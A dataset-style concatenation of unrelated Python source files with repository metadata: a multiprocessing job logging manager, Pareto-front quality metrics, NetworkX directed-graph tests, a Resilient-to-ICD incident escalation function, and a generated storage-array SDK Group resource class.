356b2234dc3c7d180282a597fa1e039ae79e03c6
|
[
"MIT"
] | null | null | null |
"""Module containing class `JobLoggingManager`."""
from collections import defaultdict
from logging import FileHandler, Handler
from logging.handlers import QueueHandler, QueueListener
from multiprocessing import Queue
import logging
import vesper.util.logging_utils as logging_utils
import vesper.util.os_utils as os_utils
# TODO: Add record count fields to the `Job` model class, and modify
# the record counts handler to update the fields both while a job is
# running and upon completion.
class _RecordCountsHandler(Handler):
def __init__(self):
super().__init__()
self.record_counts = defaultdict(int)
def emit(self, record):
self.record_counts[record.levelno] += 1
class JobLoggingManager:
"""
Manages logging for a Vesper job.
A `JobLoggingManager` manages logging for the processes of a Vesper job.
Log records can be submitted by any process of a job using any logger
(typically the root logger) configured with the `configure_logger`
static method. A logger so configured writes each log record to a
multiprocessing queue that is read by a thread running in the main
job process, which in turn writes log messages to the job's log file.
"""
@staticmethod
def configure_logger(logger, logging_config):
"""
Configures the specified logger to write log records to this job's
logging queue.
For the `logging_config` argument, the main job process can pass
the `logging_config` attribute of its `JobLoggingManager`. This
information is also passed to the `execute` method of the job's
command as the `logging_config` attribute of the command's
execution context. The information is picklable, so it can be
delivered easily to any additional process started by the main
job process as an argument to the process's target function.
"""
level, queue = logging_config
logger.setLevel(level)
handler = QueueHandler(queue)
logger.addHandler(handler)
def __init__(self, job, level):
self.job = job
self.level = level
# Create queue through which log records can be sent from various
# processes and threads to the logging thread.
self.queue = Queue()
formatter = logging_utils.create_formatter()
# Create handler that writes log messages to the job log file.
os_utils.create_parent_directory(job.log_file_path)
file_handler = FileHandler(job.log_file_path, 'w')
file_handler.setFormatter(formatter)
# We used to create a second handler here, of type StreamHandler,
# which wrote messages to stderr, and add it to the QueueListener
# below, but that is no longer desirable since we now configure
# console output on the root logger in our Django project's
# settings.py file. Adding the second handler here would be
# redundant, causing jobs to output two copies of each log
# message to the console.
self._record_counts_handler = _RecordCountsHandler()
# Create logging listener that will run on its own thread and log
# messages sent to it via the queue.
self._listener = QueueListener(
self.queue, file_handler, self._record_counts_handler)
@property
def logging_config(self):
return (self.level, self.queue)
@property
def record_counts(self):
return dict(self._record_counts_handler.record_counts)
def start_up_logging(self):
self._listener.start()
def shut_down_logging(self):
# Tell logging listener to terminate, and wait for it to do so.
self._listener.stop()
logging.shutdown()
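# --- Usage sketch (not part of the original module) ---
# A minimal illustration, assuming a stand-in `job` object that only provides
# the `log_file_path` attribute used by the constructor above. The listener
# thread is started, a logger is pointed at the shared queue, one record is
# logged, and logging is shut down again.
def _job_logging_sketch(log_file_path='sketch_logs/job.log'):
    class _FakeJob:
        pass
    fake_job = _FakeJob()
    fake_job.log_file_path = log_file_path
    manager = JobLoggingManager(fake_job, logging.INFO)
    manager.start_up_logging()
    logger = logging.getLogger('job_logging_sketch')
    JobLoggingManager.configure_logger(logger, manager.logging_config)
    logger.info('hello from the job logging sketch')
    manager.shut_down_logging()
    return manager.record_counts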
| 34.068376
| 76
| 0.659809
| 3,467
| 0.869794
| 0
| 0
| 1,054
| 0.264425
| 0
| 0
| 2,066
| 0.518314
|
3bfc3d39f5d7c8e9a54f0fc8a5c3d30aa858a4b2
| 4,837
|
py
|
Python
|
evaluation/metrics.py
|
victorperezpiqueras/MONRP
|
f20bbde8895867d37b735dec7a5fd95ee90fadf6
|
[
"MIT"
] | null | null | null |
evaluation/metrics.py
|
victorperezpiqueras/MONRP
|
f20bbde8895867d37b735dec7a5fd95ee90fadf6
|
[
"MIT"
] | 2
|
2021-05-05T14:41:24.000Z
|
2022-01-18T09:08:06.000Z
|
evaluation/metrics.py
|
victorperezpiqueras/MONRP
|
f20bbde8895867d37b735dec7a5fd95ee90fadf6
|
[
"MIT"
] | null | null | null |
import math
from typing import List
import numpy as np
from datasets.Dataset import Dataset
from models.Solution import Solution
def calculate_avgValue(population: List[Solution]) -> float:
avgValue = 0
for ind in population:
avgValue += ind.compute_mono_objective_score()
avgValue /= len(population)
return avgValue
def calculate_bestAvgValue(population: List[Solution]) -> float:
bestAvgValue = 0
for ind in population:
if bestAvgValue < ind.compute_mono_objective_score():
bestAvgValue = ind.compute_mono_objective_score()
return bestAvgValue
def calculate_numSolutions(population: List[Solution]) -> int:
return len(set(population))
def calculate_spacing(population: List[Solution]) -> float:
n = len(population)
N = 2
spacing = 0
mean_objectives = []
objective = 0
for j in range(0, len(population)):
objective += population[j].total_cost
objective /= len(population)
mean_objectives.append(objective)
objective = 0
for j in range(0, len(population)):
objective += population[j].total_satisfaction
objective /= len(population)
mean_objectives.append(objective)
for j in range(0, len(population)):
aux_spacing = 0
for i in range(0, N):
di = mean_objectives[i]
if i == 0:
dij = population[j].total_cost
elif i == 1:
dij = population[j].total_satisfaction
aux = (1 - (abs(dij) / di)) ** 2
aux_spacing += aux
aux_spacing = math.sqrt(aux_spacing)
spacing += aux_spacing
spacing /= (n * N)
return spacing
def calculate_hypervolume(population: List[Solution]) -> float:
objectives_diff = []
aux_max_cost, aux_max_sat = population[0].get_max_cost_satisfactions()
aux_min_cost, aux_min_sat = population[0].get_min_cost_satisfactions()
aux_min = float('inf')
aux_max = 0
for ind in population:
if ind.total_cost < aux_min:
aux_min = ind.total_cost
if ind.total_cost > aux_max:
aux_max = ind.total_cost
aux_max_norm = (aux_max-aux_min_cost)/(aux_max_cost-aux_min_cost)
aux_min_norm = (aux_min-aux_min_cost)/(aux_max_cost-aux_min_cost)
aux_val = aux_max_norm-aux_min_norm
objectives_diff.append(aux_val)
aux_min = float('inf')
aux_max = 0
for ind in population:
if ind.total_satisfaction < aux_min:
aux_min = ind.total_satisfaction
if ind.total_satisfaction > aux_max:
aux_max = ind.total_satisfaction
aux_max_norm = (aux_max-aux_min_sat)/(aux_max_sat-aux_min_sat)
aux_min_norm = (aux_min-aux_min_sat)/(aux_max_sat-aux_min_sat)
aux_val = aux_max_norm-aux_min_norm
objectives_diff.append(aux_val)
hypervolume = 1
for i in range(0, len(objectives_diff)):
hypervolume *= objectives_diff[i]
return hypervolume
def eudis2(v1: List[float], v2: List[float]) -> float:
return math.dist(v1, v2)
# return distance.euclidean(v1, v2)
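def _eudis2_example() -> float:
    # Illustrative sanity check (not part of the original metrics): the
    # Euclidean distance between the 2-D points (0, 0) and (3, 4) is 5.0.
    return eudis2([0.0, 0.0], [3.0, 4.0])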
def calculate_spread(population: List[Solution], dataset: Dataset) -> float:
MIN_OBJ1 = 0
MIN_OBJ2 = 0
MAX_OBJ1 = np.max(dataset.pbis_satisfaction_scaled)
MAX_OBJ2 = np.max(dataset.pbis_cost_scaled)
df = None
dl = None
davg = None
sum_dist = None
N = len(population)
spread = None
first_solution = population[0]
last_solution = population[len(population) - 1]
first_extreme = [MIN_OBJ1, MIN_OBJ2]
last_extreme = [MAX_OBJ1, MAX_OBJ2]
df = eudis2([first_solution.total_satisfaction,
first_solution.total_cost], first_extreme)
dl = eudis2([last_solution.total_satisfaction,
last_solution.total_cost], last_extreme)
davg = 0
dist_count = 0
for i in range(0, len(population)):
for j in range(0, len(population)):
# avoid distance from a point to itself
if i != j:
dist_count += 1
davg += eudis2([population[i].total_satisfaction, population[i].total_cost],
[population[j].total_satisfaction, population[j].total_cost])
davg /= dist_count
# calculate sumatory(i=1->N-1) |di-davg|
sum_dist = 0
for i in range(0, len(population) - 1):
di = eudis2([population[i].total_satisfaction, population[i].total_cost],
[population[i + 1].total_satisfaction, population[i + 1].total_cost])
sum_dist += abs(di - davg)
# spread formula
spread = (df + dl + sum_dist) / (df + dl + (N - 1) * davg)
return spread
def calculate_mean_bits_per_sol(solutions: List[Solution]) -> float:
genes = 0
n_sols = len(solutions)
for sol in solutions:
genes += np.count_nonzero(sol.selected)
return genes/n_sols
| 30.23125
| 92
| 0.64999
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.028944
|
3bfc6525bf99e8218a93653bc016cb8baae15ea1
| 3,803
|
py
|
Python
|
networkx/classes/tests/test_digraph_historical.py
|
KyleBenson/networkx
|
26ccb4a380ba0e5304d7bbff53eb9859c6e4c93a
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/classes/tests/test_digraph_historical.py
|
KyleBenson/networkx
|
26ccb4a380ba0e5304d7bbff53eb9859c6e4c93a
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/classes/tests/test_digraph_historical.py
|
KyleBenson/networkx
|
26ccb4a380ba0e5304d7bbff53eb9859c6e4c93a
|
[
"BSD-3-Clause"
] | 1
|
2019-01-30T17:57:36.000Z
|
2019-01-30T17:57:36.000Z
|
#!/usr/bin/env python
"""Original NetworkX graph tests"""
from nose.tools import *
import networkx
import networkx as nx
from networkx.testing.utils import *
from historical_tests import HistoricalTests
class TestDiGraphHistorical(HistoricalTests):
def setUp(self):
HistoricalTests.setUp(self)
self.G=nx.DiGraph
def test_in_degree(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(d for n, d in G.in_degree()),[0, 0, 0, 0, 1, 2, 2])
assert_equal(dict(G.in_degree()),
{'A': 0, 'C': 2, 'B': 1, 'D': 2, 'G': 0, 'K': 0, 'J': 0})
def test_out_degree(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted([v for k,v in G.in_degree()]),
[0, 0, 0, 0, 1, 2, 2])
assert_equal(dict(G.out_degree()),
{'A': 2, 'C': 1, 'B': 2, 'D': 0, 'G': 0, 'K': 0, 'J': 0})
def test_degree_digraph(self):
H=nx.DiGraph()
H.add_edges_from([(1,24),(1,2)])
assert_equal(sorted(d for n, d in H.in_degree([1,24])), [0, 1])
assert_equal(sorted(d for n, d in H.out_degree([1,24])), [0, 2])
assert_equal(sorted(d for n, d in H.degree([1,24])), [1, 2])
def test_neighbors(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(G.neighbors('C')),['D'])
assert_equal(sorted(G['C']),['D'])
assert_equal(sorted(G.neighbors('A')),['B', 'C'])
assert_raises(nx.NetworkXError,G.neighbors,'j')
assert_raises(nx.NetworkXError,G.neighbors,'j')
def test_successors(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(G.successors('A')),['B', 'C'])
assert_equal(sorted(G.successors('A')),['B', 'C'])
assert_equal(sorted(G.successors('G')),[])
assert_equal(sorted(G.successors('D')),[])
assert_equal(sorted(G.successors('G')),[])
assert_raises(nx.NetworkXError,G.successors,'j')
assert_raises(nx.NetworkXError,G.successors,'j')
def test_predecessors(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(G.predecessors('C')),['A', 'B'])
assert_equal(sorted(G.predecessors('C')),['A', 'B'])
assert_equal(sorted(G.predecessors('G')),[])
assert_equal(sorted(G.predecessors('A')),[])
assert_equal(sorted(G.predecessors('G')),[])
assert_equal(sorted(G.predecessors('A')),[])
assert_equal(sorted(G.successors('D')),[])
assert_raises(nx.NetworkXError,G.predecessors,'j')
assert_raises(nx.NetworkXError,G.predecessors,'j')
def test_reverse(self):
G=nx.complete_graph(10)
H=G.to_directed()
HR=H.reverse()
assert_true(nx.is_isomorphic(H,HR))
assert_equal(sorted(H.edges()),sorted(HR.edges()))
def test_reverse2(self):
H=nx.DiGraph()
foo=[H.add_edge(u,u+1) for u in range(0,5)]
HR=H.reverse()
for u in range(0,5):
assert_true(HR.has_edge(u+1,u))
def test_reverse3(self):
H=nx.DiGraph()
H.add_nodes_from([1,2,3,4])
HR=H.reverse()
assert_equal(sorted(HR.nodes()),[1, 2, 3, 4])
| 34.889908
| 79
| 0.519853
| 3,596
| 0.945569
| 0
| 0
| 0
| 0
| 0
| 0
| 372
| 0.097818
|
3bfc66ab6394f443698742193984f19425d0486f
| 6,325
|
py
|
Python
|
older/fn_res_to_icd/fn_res_to_icd/components/res_to_icd_function.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 65
|
2017-12-04T13:58:32.000Z
|
2022-03-24T18:33:17.000Z
|
older/fn_res_to_icd/fn_res_to_icd/components/res_to_icd_function.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 48
|
2018-03-02T19:17:14.000Z
|
2022-03-09T22:00:38.000Z
|
older/fn_res_to_icd/fn_res_to_icd/components/res_to_icd_function.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 95
|
2018-01-11T16:23:39.000Z
|
2022-03-21T11:34:29.000Z
|
# -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use
import logging
import re
import sys
import requests
from bs4 import BeautifulSoup as bsoup
from resilient_circuits import ResilientComponent, function, handler
from resilient_circuits import StatusMessage, FunctionResult, FunctionError
from resilient_lib import ResultPayload, readable_datetime
from resilient_lib.components.resilient_common import validate_fields
# The lowest priority an ICD ticket can have as a default setting for escalation
MIN_PRIORITY_ICD = 4
class FunctionComponent(ResilientComponent):
"""Component that implements Resilient function 'res_to_icd_function"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(FunctionComponent, self).__init__(opts)
self.options = opts.get("fn_res_to_icd", {})
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get("fn_res_to_icd", {})
@function("res_to_icd_function")
def _res_to_icd_function_function(self, event, *args, **kwargs):
try:
# taken from config section
icd_email = self.options.get("icd_email")
icd_pass = self.options.get("icd_pass")
icd_priority = self.options.get("icd_priority")
icd_field_severity = self.options.get('icd_field_severity')
icd_url = self.options.get('icd_url')
incident_id = kwargs.get("incident_id")
# Payload and validation
payload = ResultPayload('fn_res_to_icd', **kwargs)
validate_fields(['icd_email','icd_pass','icd_url','icd_field_severity'], self.options)
validate_fields(['incident_id'], kwargs)
#logging
log = logging.getLogger(__name__)
log.info("icd_email: %s", icd_email)
log.info("icd_field_severity: %s", icd_field_severity)
log.info("icd_priority: %s", icd_priority)
log.info("incident_id: %s", incident_id)
log.info("icd_url: %s", icd_url)
# Resilient client and api calls
res_client = self.rest_client()
incident_str = '/incidents/{incident_id}/'.format(incident_id=incident_id)
artifact_str = '/incidents/{incident_id}/artifacts'.format(incident_id=incident_id)
field_severity = {}
if icd_field_severity:
# If api call for custom severity field is not successful, Ticket defaults to minimum priority
try:
fieldsev_str = '/types/{type}/fields/{field}'.format(type='incident', field=icd_field_severity)
field_severity = res_client.get(fieldsev_str)
except:
field_severity['values'] = MIN_PRIORITY_ICD
content = res_client.get(incident_str)
art_content = res_client.get(artifact_str)
# Time and date
timestamp = content['create_date']
timeval = readable_datetime(timestamp, milliseconds=True, rtn_format='%Y-%m-%dT%H:%M:%SZ')
time = "Date and Time: {0}".format(timeval)
#artifact population to icd ticket
details_payload = ''
i = 0
j = 0
if icd_field_severity:
try:
for i in range(0, len(art_content)):
if art_content[i].get('properties', False):
if art_content[i]['properties'][0]['name'] in ('source', 'destination'):
j+=1
details_payload += 'ID: {1} IP Address {2}: {0} \n'.format(art_content[i]['value'], art_content[i]['id'], art_content[i]['properties'][0]['name'].capitalize())
log.info("Artifacts added to ICD ticket: {0}".format(j))
except Exception as artifact_error:
log.error(artifact_error)
log.error("Encountered an error parsing artifacts")
## If your custom field isn't specified, it defaults to min priority
if icd_field_severity:
try:
field_sev = field_severity['values']
except:
field_sev = field_severity['name']
if not field_sev:
field_sev = 1 # number
log.info("field_severity: %s", field_sev)
icd_priority_lookup = [0, 4, 4, 4, 3, 2, 2, 1]
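# index = Resilient severity value (1-7), element = ICD priority
# (1 = highest, 4 = lowest); e.g. a severity of 5 maps to ICD priority 2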
try:
icd_priority = icd_priority_lookup[field_sev]
log.info("icd_priority: %s", field_sev)
except:
log.warning("You have not set a priority, icd priority will be set to min value (4)")
icd_priority = MIN_PRIORITY_ICD
# Params and Desk call
params = {"DESCRIPTION" : time,
"DESCRIPTION_LONGDESCRIPTION" : details_payload,
"REPORTEDBYID" : icd_email,
"logtype" : "CLIENTNOTE",
"worklog.1.description" : "SECURITY ISSUE",
"worklog.1.DESCRIPTION_LONGDESCRIPTION" : "SECURITY ISSUE",
"INTERNALPRIORITY" : icd_priority,
"SITEID" : "APPOPINT", "CLASSIFICATIONID" : "SECURITY ISSUE",
"_lid" : icd_email,
"_lpwd" : icd_pass}
endpoint = "/rest/os/MXINCIDENT/"
base_url= icd_url + endpoint
response = requests.post(url=base_url, params=params, verify=False)
xmldata = bsoup(response.text,"html.parser")
icd_id = '{0}'.format(xmldata.createmxincidentresponse.mxincidentset.incident.ticketid)
icd_id = re.sub('[ticket<>/d]', '', icd_id)
yield StatusMessage("Completed successfully")
results = payload.done(success=True, content={
"incident_escalated" : incident_id,
"icd_id" : icd_id,
"details" : details_payload
})
# Produce a FunctionResult with the results
yield FunctionResult(results)
log.info("Complete")
except Exception:
yield FunctionError()
| 49.031008
| 191
| 0.591146
| 5,723
| 0.904822
| 5,172
| 0.817708
| 5,382
| 0.850909
| 0
| 0
| 1,931
| 0.305296
|
ce017638896c04f18c2cb7532f41f9850780cdae
| 28,484
|
py
|
Python
|
nimbleclient/v1/api/groups.py
|
prachiruparelia-hpe/nimble-python-sdk
|
a3e99d89e647291caf7936300ae853d21d94d6e5
|
[
"Apache-2.0"
] | 1
|
2020-05-28T19:48:59.000Z
|
2020-05-28T19:48:59.000Z
|
nimbleclient/v1/api/groups.py
|
prachiruparelia-hpe/nimble-python-sdk
|
a3e99d89e647291caf7936300ae853d21d94d6e5
|
[
"Apache-2.0"
] | null | null | null |
nimbleclient/v1/api/groups.py
|
prachiruparelia-hpe/nimble-python-sdk
|
a3e99d89e647291caf7936300ae853d21d94d6e5
|
[
"Apache-2.0"
] | null | null | null |
#
# © Copyright 2020 Hewlett Packard Enterprise Development LP
#
# This file was auto-generated by the Python SDK generator; DO NOT EDIT.
#
from ...resource import Resource, Collection
from ...exceptions import NimOSAPIOperationUnsupported
class Group(Resource):
"""Group is a collection of arrays operating together organized into storage pools.
# Parameters
id : Identifier of the group.
name : Name of the group.
smtp_server : Hostname or IP Address of SMTP Server.
smtp_port : Port number of SMTP Server.
smtp_auth_enabled : Whether SMTP Server requires authentication.
smtp_auth_username : Username to authenticate with SMTP Server.
smtp_auth_password : Password to authenticate with SMTP Server.
smtp_encrypt_type : Level of encryption for SMTP. Requires use of SMTP Authentication if encryption is enabled.
autosupport_enabled : Whether to send autosupport.
allow_analytics_gui : Specify whether to allow HPE Nimble Storage to use Google Analytics in the GUI. HPE Nimble Storage uses Google Analytics to gather
data related to GUI usage. The data gathered is used to evaluate and improve the product.
allow_support_tunnel : Whether to allow support tunnel.
proxy_server : Hostname or IP Address of HTTP Proxy Server. Setting this attribute to an empty string will unset all proxy settings.
proxy_port : Proxy Port of HTTP Proxy Server.
proxy_username : Username to authenticate with HTTP Proxy Server.
proxy_password : Password to authenticate with HTTP Proxy Server.
alert_to_email_addrs : Comma-separated list of email addresss to receive emails.
send_alert_to_support : Whether to send alert to Support.
alert_from_email_addr : From email address to use while sending emails.
alert_min_level : Minimum level of alert to be notified.
isns_enabled : Whether iSNS is enabled.
isns_server : Hostname or IP Address of iSNS Server.
isns_port : Port number for iSNS Server.
snmp_trap_enabled : Whether to enable SNMP traps.
snmp_trap_host : Hostname or IP Address to send SNMP traps.
snmp_trap_port : Port number of SNMP trap host.
snmp_get_enabled : Whether to accept SNMP get commands.
snmp_community : Community string to be used with SNMP.
snmp_get_port : Port number to which SNMP get requests should be sent.
snmp_sys_contact : Name of the SNMP administrator.
snmp_sys_location : Location of the group.
domain_name : Domain name for this group.
dns_servers : IP addresses for this group's dns servers.
ntp_server : Either IP address or hostname of the NTP server for this group.
timezone : Timezone in which this group is located.
user_inactivity_timeout : The amount of time in seconds that the user session is inactive before timing out.
syslogd_enabled : Is syslogd enabled on this system.
syslogd_server : Hostname of the syslogd server.
syslogd_port : Port number for syslogd server.
syslogd_servers : Hostname and/or port of the syslogd servers.
vvol_enabled : Are vvols enabled on this group.
iscsi_enabled : Whether iSCSI is enabled on this group.
fc_enabled : Whether FC is enabled on this group.
unique_name_enabled : Are new volume and volume collection names transformed on this group.
access_protocol_list : Protocol used to access this group.
group_target_enabled : Is group_target enabled on this group.
default_iscsi_target_scope : Newly created volumes are exported under iSCSI Group Target or iSCSI Volume Target.
tdz_enabled : Is Target Driven Zoning (TDZ) enabled on this group.
tdz_prefix : Target Driven Zoning (TDZ) prefix for peer zones created by TDZ.
group_target_name : Iscsi target name for this group.
default_volume_reserve : Amount of space to reserve for a volume as a percentage of volume size.
default_volume_warn_level : Default threshold for volume space usage as a percentage of volume size above which an alert is raised.
default_volume_limit : Default limit for a volume space usage as a percentage of volume size. Volume will be taken offline/made non-writable on exceeding its
limit.
default_snap_reserve : Amount of space to reserve for snapshots of a volume as a percentage of volume size.
default_snap_warn_level : Default threshold for snapshot space usage of a volume as a percentage of volume size above which an alert is raised.
default_snap_limit : This attribute is deprecated. The array does not limit a volume's snapshot space usage. The attribute is ignored on input and returns
max int64 value on output.
default_snap_limit_percent : This attribute is deprecated. The array does not limit a volume's snapshot space usage. The attribute is ignored on input and returns
-1 on output.
alarms_enabled : Whether alarm feature is enabled.
vss_validation_timeout : The amount of time in seconds to validate Microsoft VSS application synchronization before timing out.
auto_switchover_enabled : Whether automatic switchover of Group management services feature is enabled.
auto_switchover_messages : List of validation messages for automatic switchover of Group Management. This will be empty when there are no conflicts found.
merge_state : State of group merge.
merge_group_name : Group that we're being merged with.
tlsv1_enabled : Enable or disable TLSv1.0 and TLSv1.1.
cc_mode_enabled : Enable or disable Common Criteria mode.
group_snapshot_ttl : Snapshot Time-to-live(TTL) configured at group level for automatic deletion of unmanaged snapshots. Value 0 indicates unlimited TTL.
autoclean_unmanaged_snapshots_ttl_unit : Unit for unmanaged snapshot time to live.
autoclean_unmanaged_snapshots_enabled : Whether autoclean unmanaged snapshots feature is enabled.
leader_array_name : Name of the array where the group Management Service is running.
leader_array_serial : Serial number of the array where the group Management Service is running.
management_service_backup_array_name : Name of the array where backup the group Management Service is running.
management_service_backup_status : HA status of the group Management Service.
failover_mode : Failover mode of the group Management Service.
witness_status : Witness status from group Management Service array and group Management Service backup array.
member_list : Members of this group.
compressed_vol_usage_bytes : Compressed usage of volumes in the group.
compressed_snap_usage_bytes : Compressed usage of snapshots in the group.
uncompressed_vol_usage_bytes : Uncompressed usage of volumes in the group.
uncompressed_snap_usage_bytes : Uncompressed usage of snapshots in the group.
usable_capacity_bytes : Usable capacity bytes of the group.
usage : Used space of the group in bytes.
raw_capacity : Total capacity of the group.
usable_cache_capacity : Usable cache capacity of the group.
raw_cache_capacity : Total cache capacity of the group.
snap_usage_populated : Total snapshot usage as if each snapshot is deep copy of the volume.
pending_deletes : Usage for blocks that are not yet deleted.
num_connections : Number of connections to the group.
vol_compression_ratio : Compression ratio of volumes in the group.
snap_compression_ratio : Compression ratio of snapshots in the group.
compression_ratio : Compression savings for the group expressed as ratio.
dedupe_ratio : Dedupe savings for the group expressed as ratio.
clone_ratio : Clone savings for the group expressed as ratio.
vol_thin_provisioning_ratio : Thin provisioning savings for volumes in the group expressed as ratio.
savings_ratio : Overall savings in the group expressed as ratio.
data_reduction_ratio : Space savings in the group that does not include thin-provisioning savings expressed as ratio.
savings_dedupe : Space usage savings in the group due to deduplication.
savings_compression : Space usage savings in the group due to compression.
savings_clone : Space usage savings in the group due to cloning of volumes.
savings_vol_thin_provisioning : Space usage savings in the group due to thin provisioning of volumes.
savings_data_reduction : Space usage savings in the group that does not include thin-provisioning savings.
savings : Overall space usage savings in the group.
free_space : Free space of the pool in bytes.
unused_reserve_bytes : Reserved space that is not utilized.
usage_valid : Indicates whether the usage of group is valid.
space_info_valid : Is space info for this group valid.
version_current : Version of software running on the group.
version_target : Desired software version for the group.
version_rollback : Rollback software version for the group.
update_state : Group update state.
update_start_time : Start time of last update.
update_end_time : End time of last update.
update_array_names : Arrays in the group undergoing update.
update_progress_msg : Group update detailed progress message.
update_error_code : If the software update has failed, this indicates the error code corresponding to the failure.
update_downloading : Is software update package currently downloading.
update_download_error_code : If the software download has failed, this indicates the error code corresponding to the failure.
update_download_start_time : Start time of last update.
update_download_end_time : End time of last update.
iscsi_automatic_connection_method : Is iscsi reconnection automatic.
iscsi_connection_rebalancing : Does iscsi automatically rebalance connections.
repl_throttled_bandwidth : Current bandwidth throttle for replication, expressed either as megabits per second or as -1 to indicate that there is no throttle.
repl_throttled_bandwidth_kbps : Current bandwidth throttle for replication, expressed either as kilobits per second or as -1 to indicate that there is no throttle.
repl_throttle_list : All the replication bandwidth limits on the system.
volume_migration_status : Status of data migration activity related to volumes being relocated to different pools.
array_unassign_migration_status : Data migration status for arrays being removed from their pool.
data_rebalance_status : Status of data rebalancing operations for pools in the group.
scsi_vendor_id : SCSI vendor ID.
encryption_config : How encryption is configured for this group.
last_login : Time and user of last login to this group.
num_snaps : Number of snapshots in the group.
num_snapcolls : Number of snapshot collections in this group.
date : Unix epoch time local to the group.
login_banner_message : The message for the login banner that is displayed during user login activity.
login_banner_after_auth : Should the banner be displayed before the user credentials are prompted or after prompting the user credentials.
login_banner_reset : This will reset the banner to the version of the installed NOS. When login_banner_after_auth is specified, login_banner_reset can not
be set to true.
snap_retn_meter_high : Threshold for considering a volume as high retention.
snap_retn_meter_very_high : Threshold for considering a volume as very high retention.
"""
def reboot(self, **kwargs):
"""Reboot all arrays in the group.
# Parameters
id : ID of the group to reboot.
job_timeout: Job timeout in seconds.
"""
return self._collection.reboot(
self.id,
**kwargs
)
def halt(self, **kwargs):
"""Halt all arrays in the group.
# Parameters
id : ID of the group to halt.
force : Halt remaining arrays when one or more is unreachable.
job_timeout: Job timeout in seconds.
"""
return self._collection.halt(
self.id,
**kwargs
)
def test_alert(self, level, **kwargs):
"""Generate a test alert.
# Parameters
id : ID of the group.
level : Level of the test alert.
"""
return self._collection.test_alert(
self.id,
level,
**kwargs
)
def software_update_precheck(self, **kwargs):
"""Run software update precheck.
# Parameters
id : ID of the group.
skip_precheck_mask : Flag to allow skipping certain types of prechecks.
"""
return self._collection.software_update_precheck(
self.id,
**kwargs
)
def software_update_start(self, **kwargs):
"""Update the group software to the downloaded version.
# Parameters
id : ID of the group.
skip_start_check_mask : Flag to allow skipping certain types of checks.
"""
return self._collection.software_update_start(
self.id,
**kwargs
)
def software_download(self, version, **kwargs):
"""Download software update package.
# Parameters
id : ID of the group.
version : Version string to download.
force : Flag to force download.
"""
return self._collection.software_download(
self.id,
version,
**kwargs
)
def software_cancel_download(self, **kwargs):
"""Cancel ongoing download of software.
# Parameters
id : ID of the group.
"""
return self._collection.software_cancel_download(
self.id,
**kwargs
)
def software_update_resume(self, **kwargs):
"""Resume stopped software update.
# Parameters
id : ID of the group.
"""
return self._collection.software_update_resume(
self.id,
**kwargs
)
def get_group_discovered_list(self, **kwargs):
"""Get list of discovered groups with arrays that are initialized.
# Parameters
id : ID of the group.
group_name : Name of the group requested to be discovered.
"""
return self._collection.get_group_discovered_list(
self.id,
**kwargs
)
def validate_merge(self, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge validation.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
"""
return self._collection.validate_merge(
self.id,
src_group_ip,
src_group_name,
src_password,
src_username,
**kwargs
)
def merge(self, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge with the specified group.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
force : Ignore warnings and forcibly merge specified group with this group.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
job_timeout : Job timeout in seconds.
"""
return self._collection.merge(
self.id,
src_group_ip,
src_group_name,
src_password,
src_username,
**kwargs
)
def get_eula(self, **kwargs):
"""Get URL to download EULA contents.
# Parameters
id : ID of the group.
locale : Locale of EULA contents. Default is en.
format : Format of EULA contents. Default is HTML.
phase : Phase of EULA contents. Default is setup.
force : Flag to force EULA.
"""
return self._collection.get_eula(
self.id,
**kwargs
)
def check_migrate(self, **kwargs):
"""Check if the group Management Service can be migrated to the group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._collection.check_migrate(
self.id,
**kwargs
)
def migrate(self, **kwargs):
"""Migrate the group Management Service to the current group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._collection.migrate(
self.id,
**kwargs
)
def get_timezone_list(self, **kwargs):
"""Get list of group timezones.
# Parameters
id : ID of the group.
"""
return self._collection.get_timezone_list(
self.id,
**kwargs
)
def create(self, **kwargs):
raise NimOSAPIOperationUnsupported("create operation not supported")
def delete(self, **kwargs):
raise NimOSAPIOperationUnsupported("delete operation not supported")
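# --- Usage sketch (illustrative, not part of the generated SDK file) ---
# Assuming a `Group` instance obtained through its collection (the exact
# client construction lives outside this module), resource methods simply
# delegate to the owning `GroupList`, e.g.:
#
#     group.test_alert(level='INFO')   # fire a test alert for this group
#     group.get_timezone_list()        # list available group timezones
#     group.create()                   # raises NimOSAPIOperationUnsupported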
class GroupList(Collection):
resource = Group
